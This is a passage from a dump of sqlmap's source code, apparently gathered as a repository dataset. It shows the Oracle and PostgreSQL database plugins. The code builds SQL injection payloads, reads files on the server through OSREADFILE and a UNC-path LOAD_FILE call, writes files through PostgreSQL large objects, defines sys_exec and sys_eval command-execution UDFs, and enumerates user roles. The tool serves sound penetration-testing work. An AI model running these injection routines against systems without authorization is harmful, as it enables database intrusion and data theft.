self.uncPath)\n            query = agent.suffixQuery(query)\n            payload = agent.payload(newValue=query)\n\n            Request.queryPage(payload)\n        else:\n            inject.goStacked(\"SELECT LOAD_FILE('%s')\" % self.uncPath, silent=True)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import ORACLE_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.oracle.enumeration import Enumeration\nfrom plugins.dbms.oracle.filesystem import Filesystem\nfrom plugins.dbms.oracle.fingerprint import Fingerprint\nfrom plugins.dbms.oracle.syntax import Syntax\nfrom plugins.dbms.oracle.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass OracleMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines Oracle methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = ORACLE_SYSTEM_DBS\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.ORACLE] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import cx_Oracle\nexcept:\n    pass\n\nimport logging\nimport os\nimport re\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.convert import getText\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nos.environ[\"NLS_LANG\"] = \".AL32UTF8\"\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: https://oracle.github.io/python-cx_Oracle/\n    User https://cx-oracle.readthedocs.io/en/latest/\n    API: https://wiki.python.org/moin/DatabaseProgramming\n    License: https://cx-oracle.readthedocs.io/en/latest/license.html#license\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n        self.__dsn = cx_Oracle.makedsn(self.hostname, self.port, self.db)\n        self.__dsn = getText(self.__dsn)\n        self.user = getText(self.user)\n        self.password = getText(self.password)\n\n        try:\n            self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password, mode=cx_Oracle.SYSDBA)\n            logger.info(\"successfully connected as SYSDBA\")\n        except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError) as ex:\n            if \"Oracle Client library\" in getSafeExString(ex):\n                msg = re.sub(r\"DPI-\\d+:\\s+\", \"\", getSafeExString(ex))\n                msg = re.sub(r': (\"[^\"]+\")', r\" (\\g<1>)\", msg)\n                msg = re.sub(r\". See (http[^ ]+)\", r'. See \"\\g<1>\"', msg)\n                raise SqlmapConnectionException(msg)\n\n            try:\n                self.connector = cx_Oracle.connect(dsn=self.__dsn, user=self.user, password=self.password)\n            except (cx_Oracle.OperationalError, cx_Oracle.DatabaseError, cx_Oracle.InterfaceError) as ex:\n                raise SqlmapConnectionException(ex)\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except cx_Oracle.InterfaceError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(getText(query))\n            retVal = True\n        except cx_Oracle.DatabaseError as ex:\n            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, \"(remote) '%s'\" % getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import getLimitRange\nfrom lib.core.common import isAdminFromPrivileges\nfrom lib.core.common import isInferenceAvailable\nfrom lib.core.common import isNoneValue\nfrom lib.core.common import isNumPosStrValue\nfrom lib.core.common import isTechniqueAvailable\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import PAYLOAD\nfrom lib.core.exception import SqlmapNoneDataException\nfrom lib.core.settings import CURRENT_USER\nfrom lib.request import inject\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getRoles(self, query2=False):\n        infoMsg = \"fetching database users roles\"\n\n        rootQuery = queries[DBMS.ORACLE].roles\n\n        if conf.user == CURRENT_USER:\n            infoMsg += \" for current user\"\n            conf.user = self.getCurrentUser()\n\n        logger.info(infoMsg)\n\n        # Set containing the list of DBMS administrators\n        areAdmins = set()\n\n        if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:\n            if query2:\n                query = rootQuery.inband.query2\n                condition = rootQuery.inband.condition2\n            else:\n                query = rootQuery.inband.query\n                condition = rootQuery.inband.condition\n\n            if conf.user:\n                users = conf.user.split(',')\n                query += \" WHERE \"\n                query += \" OR \".join(\"%s = '%s'\" % (condition, user) for user in sorted(users))\n\n            values = inject.getValue(query, blind=False, time=False)\n\n            if not values and not query2:\n                infoMsg = \"trying with table 'USER_ROLE_PRIVS'\"\n                logger.info(infoMsg)\n\n                return self.getRoles(query2=True)\n\n            if not isNoneValue(values):\n                for value in values:\n                    user = None\n                    roles = set()\n\n                    for count in xrange(0, len(value or [])):\n                        # The first column is always the username\n                        if count == 0:\n                            user = value[count]\n\n                        # The other columns are the roles\n                        else:\n                            role = value[count]\n\n                            # In Oracle we get the list of roles as string\n                            roles.add(role)\n\n                    if user in kb.data.cachedUsersRoles:\n                        kb.data.cachedUsersRoles[user] = list(roles.union(kb.data.cachedUsersRoles[user]))\n                    else:\n                        kb.data.cachedUsersRoles[user] = list(roles)\n\n        if not kb.data.cachedUsersRoles and isInferenceAvailable() and not conf.direct:\n            if conf.user:\n                users = conf.user.split(',')\n            else:\n                if not len(kb.data.cachedUsers):\n                    users = self.getUsers()\n                else:\n                    users = kb.data.cachedUsers\n\n            retrievedUsers = set()\n\n            for user in users:\n                unescapedUser = None\n\n                if user in retrievedUsers:\n                    continue\n\n                infoMsg = \"fetching number of roles \"\n                infoMsg += \"for user '%s'\" % user\n                logger.info(infoMsg)\n\n                if unescapedUser:\n                    queryUser = unescapedUser\n                else:\n                    queryUser = user\n\n                if query2:\n                    query = rootQuery.blind.count2 % queryUser\n                else:\n                    query = rootQuery.blind.count % queryUser\n                count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)\n\n                if not isNumPosStrValue(count):\n                    if count != 0 and not query2:\n                        infoMsg = \"trying with table 'USER_SYS_PRIVS'\"\n                        logger.info(infoMsg)\n\n                        return self.getPrivileges(query2=True)\n\n                    warnMsg = \"unable to retrieve the number of \"\n                    warnMsg += \"roles for user '%s'\" % user\n                    logger.warning(warnMsg)\n                    continue\n\n                infoMsg = \"fetching roles for user '%s'\" % user\n                logger.info(infoMsg)\n\n                roles = set()\n\n                indexRange = getLimitRange(count, plusOne=True)\n\n                for index in indexRange:\n                    if query2:\n                        query = rootQuery.blind.query2 % (queryUser, index)\n                    else:\n                        query = rootQuery.blind.query % (queryUser, index)\n                    role = inject.getValue(query, union=False, error=False)\n\n                    # In Oracle we get the list of roles as string\n                    roles.add(role)\n\n                if roles:\n                    kb.data.cachedUsersRoles[user] = list(roles)\n                else:\n                    warnMsg = \"unable to retrieve the roles \"\n                    warnMsg += \"for user '%s'\" % user\n                    logger.warning(warnMsg)\n\n                retrievedUsers.add(user)\n\n        if not kb.data.cachedUsersRoles:\n            errMsg = \"unable to retrieve the roles \"\n            errMsg += \"for the database users\"\n            raise SqlmapNoneDataException(errMsg)\n\n        for user, privileges in kb.data.cachedUsersRoles.items():\n            if isAdminFromPrivileges(privileges):\n                areAdmins.add(user)\n\n        return kb.data.cachedUsersRoles, areAdmins\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.agent import agent\nfrom lib.core.common import dataToOutFile\nfrom lib.core.common import decodeDbmsHexValue\nfrom lib.core.common import getSQLSnippet\nfrom lib.core.common import isNoneValue\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.request import inject\nfrom lib.request.connect import Connect as Request\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def readFile(self, remoteFile):\n        localFilePaths = []\n        snippet = getSQLSnippet(DBMS.ORACLE, \"read_file_export_extension\")\n\n        for query in snippet.split(\"\\n\"):\n            query = query.strip()\n            query = agent.prefixQuery(\"OR (%s) IS NULL\" % query)\n            query = agent.suffixQuery(query, trimEmpty=False)\n            payload = agent.payload(newValue=query)\n            Request.queryPage(payload, content=False, raise404=False, silent=True, noteResponseTime=False)\n\n        for remoteFile in remoteFile.split(','):\n            if not kb.bruteMode:\n                infoMsg = \"fetching file: '%s'\" % remoteFile\n                logger.info(infoMsg)\n\n            kb.fileReadMode = True\n            fileContent = inject.getValue(\"SELECT RAWTOHEX(OSREADFILE('%s')) FROM DUAL\" % remoteFile, charsetType=CHARSET_TYPE.HEXADECIMAL)\n            kb.fileReadMode = False\n\n            if not isNoneValue(fileContent):\n                fileContent = decodeDbmsHexValue(fileContent, True)\n\n                if fileContent.strip():\n                    localFilePath = dataToOutFile(remoteFile, fileContent)\n                    localFilePaths.append(localFilePath)\n\n            elif not kb.bruteMode:\n                errMsg = \"no data retrieved\"\n                logger.error(errMsg)\n\n        return localFilePaths\n\n    def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"File system write access not yet implemented for \"\n        errMsg += \"Oracle\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport re\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import ORACLE_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.ORACLE)\n\n    def getFingerprint(self):\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.ORACLE\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        return value\n\n    def checkDbms(self):\n        if not conf.extensiveFp and Backend.isDbmsWithin(ORACLE_ALIASES):\n            setDbms(DBMS.ORACLE)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.ORACLE\n        logger.info(infoMsg)\n\n        # NOTE: SELECT LENGTH(SYSDATE)=LENGTH(SYSDATE) FROM DUAL does\n        # not work connecting directly to the Oracle database\n        if conf.direct:\n            result = True\n        else:\n            result = inject.checkBooleanExpression(\"LENGTH(SYSDATE)=LENGTH(SYSDATE)\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.ORACLE\n            logger.info(infoMsg)\n\n            # NOTE: SELECT NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1]) FROM DUAL does\n            # not work connecting directly to the Oracle database\n            if conf.direct:\n                result = True\n            else:\n                result = inject.checkBooleanExpression(\"NVL(RAWTOHEX([RANDNUM1]),[RANDNUM1])=RAWTOHEX([RANDNUM1])\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.ORACLE\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.ORACLE)\n\n            self.getBanner()\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.ORACLE\n            logger.info(infoMsg)\n\n            # Reference: https://en.wikipedia.org/wiki/Oracle_Database\n            for version in (\"21c\", \"19c\", \"18c\", \"12c\", \"11g\", \"10g\", \"9i\", \"8i\", \"7\"):\n                number = int(re.search(r\"([\\d]+)\", version).group(1))\n                output = inject.checkBooleanExpression(\"%d=(SELECT SUBSTR((VERSION),1,%d) FROM SYS.PRODUCT_COMPONENT_VERSION WHERE ROWNUM=1)\" % (number, 1 if number < 10 else 2))\n\n                if output:\n                    Backend.setVersion(version)\n                    break\n\n            return True\n        else:\n            warnMsg = \"the back-end DBMS is not %s\" % DBMS.ORACLE\n            logger.warning(warnMsg)\n\n            return False\n\n    def forceDbmsEnum(self):\n        if conf.db:\n            conf.db = conf.db.upper()\n\n        if conf.tbl:\n            conf.tbl = conf.tbl.upper()\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/syntax.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.convert import getOrds\nfrom plugins.generic.syntax import Syntax as GenericSyntax\n\nclass Syntax(GenericSyntax):\n    @staticmethod\n    def escape(expression, quote=True):\n        \"\"\"\n        >>> Syntax.escape(\"SELECT 'abcdefgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        >>> Syntax.escape(u\"SELECT 'abcd\\xebfgh' FROM foobar\") == \"SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||NCHR(235)||CHR(102)||CHR(103)||CHR(104) FROM foobar\"\n        True\n        \"\"\"\n\n        def escaper(value):\n            return \"||\".join(\"%s(%d)\" % (\"CHR\" if _ < 128 else \"NCHR\", _) for _ in getOrds(value))\n\n        return Syntax._escape(expression, quote, escaper)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/oracle/takeover.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom plugins.generic.takeover import Takeover as GenericTakeover\n\nclass Takeover(GenericTakeover):\n    def osCmd(self):\n        errMsg = \"Operating system command execution functionality not \"\n        errMsg += \"yet implemented for Oracle\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osShell(self):\n        errMsg = \"Operating system shell functionality not yet \"\n        errMsg += \"implemented for Oracle\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osPwn(self):\n        errMsg = \"Operating system out-of-band control functionality \"\n        errMsg += \"not yet implemented for Oracle\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def osSmb(self):\n        errMsg = \"One click operating system out-of-band control \"\n        errMsg += \"functionality not yet implemented for Oracle\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/__init__.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.enums import DBMS\nfrom lib.core.settings import PGSQL_SYSTEM_DBS\nfrom lib.core.unescaper import unescaper\nfrom plugins.dbms.postgresql.enumeration import Enumeration\nfrom plugins.dbms.postgresql.filesystem import Filesystem\nfrom plugins.dbms.postgresql.fingerprint import Fingerprint\nfrom plugins.dbms.postgresql.syntax import Syntax\nfrom plugins.dbms.postgresql.takeover import Takeover\nfrom plugins.generic.misc import Miscellaneous\n\nclass PostgreSQLMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover):\n    \"\"\"\n    This class defines PostgreSQL methods\n    \"\"\"\n\n    def __init__(self):\n        self.excludeDbsList = PGSQL_SYSTEM_DBS\n        self.sysUdfs = {\n            # UDF name: UDF parameters' input data-type and return data-type\n            \"sys_exec\": {\"input\": [\"text\"], \"return\": \"int4\"},\n            \"sys_eval\": {\"input\": [\"text\"], \"return\": \"text\"},\n            \"sys_bineval\": {\"input\": [\"text\"], \"return\": \"int4\"},\n            \"sys_fileread\": {\"input\": [\"text\"], \"return\": \"text\"}\n        }\n\n        for cls in self.__class__.__bases__:\n            cls.__init__(self)\n\n    unescaper[DBMS.PGSQL] = Syntax.escape\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/connector.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\ntry:\n    import psycopg2\n    import psycopg2.extensions\n    psycopg2.extensions.register_type(psycopg2.extensions.UNICODE)\n    psycopg2.extensions.register_type(psycopg2.extensions.UNICODEARRAY)\nexcept:\n    pass\n\nfrom lib.core.common import getSafeExString\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapConnectionException\nfrom plugins.generic.connector import Connector as GenericConnector\n\nclass Connector(GenericConnector):\n    \"\"\"\n    Homepage: http://initd.org/psycopg/\n    User guide: http://initd.org/psycopg/docs/\n    API: http://initd.org/psycopg/docs/genindex.html\n    Debian package: python-psycopg2\n    License: GPL\n\n    Possible connectors: http://wiki.python.org/moin/PostgreSQL\n    \"\"\"\n\n    def connect(self):\n        self.initConnection()\n\n        try:\n            self.connector = psycopg2.connect(host=self.hostname, user=self.user, password=self.password, database=self.db, port=self.port)\n        except psycopg2.OperationalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.set_client_encoding('UNICODE')\n\n        self.initCursor()\n        self.printConnected()\n\n    def fetchall(self):\n        try:\n            return self.cursor.fetchall()\n        except psycopg2.ProgrammingError as ex:\n            logger.warning(getSafeExString(ex))\n            return None\n\n    def execute(self, query):\n        retVal = False\n\n        try:\n            self.cursor.execute(query)\n            retVal = True\n        except (psycopg2.OperationalError, psycopg2.ProgrammingError) as ex:\n            logger.warning((\"(remote) '%s'\" % getSafeExString(ex)).strip())\n        except psycopg2.InternalError as ex:\n            raise SqlmapConnectionException(getSafeExString(ex))\n\n        self.connector.commit()\n\n        return retVal\n\n    def select(self, query):\n        retVal = None\n\n        if self.execute(query):\n            retVal = self.fetchall()\n\n        return retVal\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/enumeration.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.data import logger\n\nfrom plugins.generic.enumeration import Enumeration as GenericEnumeration\n\nclass Enumeration(GenericEnumeration):\n    def getHostname(self):\n        warnMsg = \"on PostgreSQL it is not possible to enumerate the hostname\"\n        logger.warning(warnMsg)\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/filesystem.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import randomInt\nfrom lib.core.compat import xrange\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.settings import LOBLKSIZE\nfrom lib.request import inject\nfrom plugins.generic.filesystem import Filesystem as GenericFilesystem\n\nclass Filesystem(GenericFilesystem):\n    def __init__(self):\n        self.oid = None\n        self.page = None\n\n        GenericFilesystem.__init__(self)\n\n    def stackedReadFile(self, remoteFile):\n        if not kb.bruteMode:\n            infoMsg = \"fetching file: '%s'\" % remoteFile\n            logger.info(infoMsg)\n\n        self.initEnv()\n\n        return self.udfEvalCmd(cmd=remoteFile, udfName=\"sys_fileread\")\n\n    def unionWriteFile(self, localFile, remoteFile, fileType=None, forceCheck=False):\n        errMsg = \"PostgreSQL does not support file upload with UNION \"\n        errMsg += \"query SQL injection technique\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):\n        localFileSize = os.path.getsize(localFile)\n        content = open(localFile, \"rb\").read()\n\n        self.oid = randomInt()\n        self.page = 0\n\n        self.createSupportTbl(self.fileTblName, self.tblField, \"text\")\n\n        debugMsg = \"create a new OID for a large object, it implicitly \"\n        debugMsg += \"adds an entry in the large objects system table\"\n        logger.debug(debugMsg)\n\n        # References:\n        # http://www.postgresql.org/docs/8.3/interactive/largeobjects.html\n        # http://www.postgresql.org/docs/8.3/interactive/lo-funcs.html\n\n        inject.goStacked(\"SELECT lo_unlink(%d)\" % self.oid)\n        inject.goStacked(\"SELECT lo_create(%d)\" % self.oid)\n        inject.goStacked(\"DELETE FROM pg_largeobject WHERE loid=%d\" % self.oid)\n\n        for offset in xrange(0, localFileSize, LOBLKSIZE):\n            fcEncodedList = self.fileContentEncode(content[offset:offset + LOBLKSIZE], \"base64\", False)\n            sqlQueries = self.fileToSqlQueries(fcEncodedList)\n\n            for sqlQuery in sqlQueries:\n                inject.goStacked(sqlQuery)\n\n            inject.goStacked(\"INSERT INTO pg_largeobject VALUES (%d, %d, DECODE((SELECT %s FROM %s), 'base64'))\" % (self.oid, self.page, self.tblField, self.fileTblName))\n            inject.goStacked(\"DELETE FROM %s\" % self.fileTblName)\n\n            self.page += 1\n\n        debugMsg = \"exporting the OID %s file content to \" % fileType\n        debugMsg += \"file '%s'\" % remoteFile\n        logger.debug(debugMsg)\n\n        inject.goStacked(\"SELECT lo_export(%d, '%s')\" % (self.oid, remoteFile), silent=True)\n\n        written = self.askCheckWrittenFile(localFile, remoteFile, forceCheck)\n\n        inject.goStacked(\"SELECT lo_unlink(%d)\" % self.oid)\n\n        return written\n"
  },
  {
    "path": "sqlmap/plugins/dbms/postgresql/fingerprint.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nfrom lib.core.common import Backend\nfrom lib.core.common import Format\nfrom lib.core.common import hashDBRetrieve\nfrom lib.core.common import hashDBWrite\nfrom lib.core.data import conf\nfrom lib.core.data import kb\nfrom lib.core.data import logger\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import FORK\nfrom lib.core.enums import HASHDB_KEYS\nfrom lib.core.enums import OS\nfrom lib.core.session import setDbms\nfrom lib.core.settings import PGSQL_ALIASES\nfrom lib.request import inject\nfrom plugins.generic.fingerprint import Fingerprint as GenericFingerprint\n\nclass Fingerprint(GenericFingerprint):\n    def __init__(self):\n        GenericFingerprint.__init__(self, DBMS.PGSQL)\n\n    def getFingerprint(self):\n        fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)\n\n        if fork is None:\n            if inject.checkBooleanExpression(\"VERSION() LIKE '%CockroachDB%'\"):\n                fork = FORK.COCKROACHDB\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%Redshift%'\"):      # Reference: https://dataedo.com/kb/query/amazon-redshift/check-server-version\n                fork = FORK.REDSHIFT\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%Greenplum%'\"):     # Reference: http://www.sqldbpros.com/wordpress/wp-content/uploads/2014/08/what-version-of-greenplum.png\n                fork = FORK.GREENPLUM\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%Yellowbrick%'\"):   # Reference: https://www.yellowbrick.com/docs/3.3/ybd_sqlref/version.html\n                fork = FORK.YELLOWBRICK\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%EnterpriseDB%'\"):  # Reference: https://www.enterprisedb.com/edb-docs/d/edb-postgres-advanced-server/user-guides/user-guide/11/EDB_Postgres_Advanced_Server_Guide.1.087.html\n                fork = FORK.ENTERPRISEDB\n            elif inject.checkBooleanExpression(\"VERSION() LIKE '%YB-%'\"):           # Reference: https://github.com/yugabyte/yugabyte-db/issues/2447#issue-499562926\n                fork = FORK.YUGABYTEDB\n            elif inject.checkBooleanExpression(\"AURORA_VERSION() LIKE '%'\"):        # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/\n                fork = FORK.AURORA\n            else:\n                fork = \"\"\n\n            hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)\n\n        value = \"\"\n        wsOsFp = Format.getOs(\"web server\", kb.headersFp)\n\n        if wsOsFp:\n            value += \"%s\\n\" % wsOsFp\n\n        if kb.data.banner:\n            dbmsOsFp = Format.getOs(\"back-end DBMS\", kb.bannerFp)\n\n            if dbmsOsFp:\n                value += \"%s\\n\" % dbmsOsFp\n\n        value += \"back-end DBMS: \"\n\n        if not conf.extensiveFp:\n            value += DBMS.PGSQL\n            if fork:\n                value += \" (%s fork)\" % fork\n            return value\n\n        actVer = Format.getDbms()\n        blank = \" \" * 15\n        value += \"active fingerprint: %s\" % actVer\n\n        if kb.bannerFp:\n            banVer = kb.bannerFp.get(\"dbmsVersion\")\n\n            if banVer:\n                banVer = Format.getDbms([banVer])\n                value += \"\\n%sbanner parsing fingerprint: %s\" % (blank, banVer)\n\n        htmlErrorFp = Format.getErrorParsedDBMSes()\n\n        if htmlErrorFp:\n            value += \"\\n%shtml error message fingerprint: %s\" % (blank, htmlErrorFp)\n\n        if fork:\n            value += \"\\n%sfork fingerprint: %s\" % (blank, fork)\n\n        return value\n\n    def checkDbms(self):\n        \"\"\"\n        References for fingerprint:\n\n        * https://www.postgresql.org/docs/current/static/release.html\n        \"\"\"\n\n        if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):\n            setDbms(DBMS.PGSQL)\n\n            self.getBanner()\n\n            return True\n\n        infoMsg = \"testing %s\" % DBMS.PGSQL\n        logger.info(infoMsg)\n\n        # NOTE: Vertica works too without the CONVERT_TO()\n        result = inject.checkBooleanExpression(\"CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL\")\n\n        if result:\n            infoMsg = \"confirming %s\" % DBMS.PGSQL\n            logger.info(infoMsg)\n\n            result = inject.checkBooleanExpression(\"COALESCE([RANDNUM], NULL)=[RANDNUM]\")\n\n            if not result:\n                warnMsg = \"the back-end DBMS is not %s\" % DBMS.PGSQL\n                logger.warning(warnMsg)\n\n                return False\n\n            setDbms(DBMS.PGSQL)\n\n            self.getBanner()\n\n            if not conf.extensiveFp:\n                return True\n\n            infoMsg = \"actively fingerprinting %s\" % DBMS.PGSQL\n            logger.info(infoMsg)\n\n            if inject.checkBooleanExpression(\"GEN_RANDOM_UUID() IS NOT NULL\"):\n                Backend.setVersion(\">= 13.0\")\n            elif inject.checkBooleanExpression(\"SINH(0)=0\"):\n                Backend.setVersion(\">= 12.0\")\n            elif inject.checkBooleanExpression(\"SHA256(NULL) IS NULL\"):\n                Backend.setVersion(\">= 11.0\")\n            elif inject.checkBooleanExpression(\"XMLTABLE(NULL) IS NULL\"):\n                Backend.setVersionList([\">= 10.0\", \"< 11.0\"])\n            elif inject.checkBooleanExpression(\"SIND(0)=0\"):\n                Backend.setVersionList([\">= 9.6.0\", \"< 10.0\"])\n            elif inject.checkBooleanExpression(\"TO_JSONB(1) IS NOT NULL\"):\n                Backend.setVersionList([\">= 9.5.0\", \"< 9.6.0\"])\n            elif inject.checkBooleanExpression(\"JSON_TYPEOF(NULL) IS NULL\"):\n                Backend.setVersionList([\">= 9.4.0\", \"< 9.5.0\"])\n            elif inject.checkBooleanExpression(\"ARRAY_REPLACE(NULL,1,1) IS NULL\"):\n                Backend.setVersionList([\">= 9.3.0\", \"< 9.4.0\"])\n            elif inject.checkBooleanExpression(\"ROW_TO_JSON(NULL) IS NULL\"):\n                Backend.setVersionList([\">= 9.2.0\", \"< 9.3.0\"])\n            elif inject.checkBooleanExpression(\"REVERSE('sqlmap')='pamlqs'\"):\n                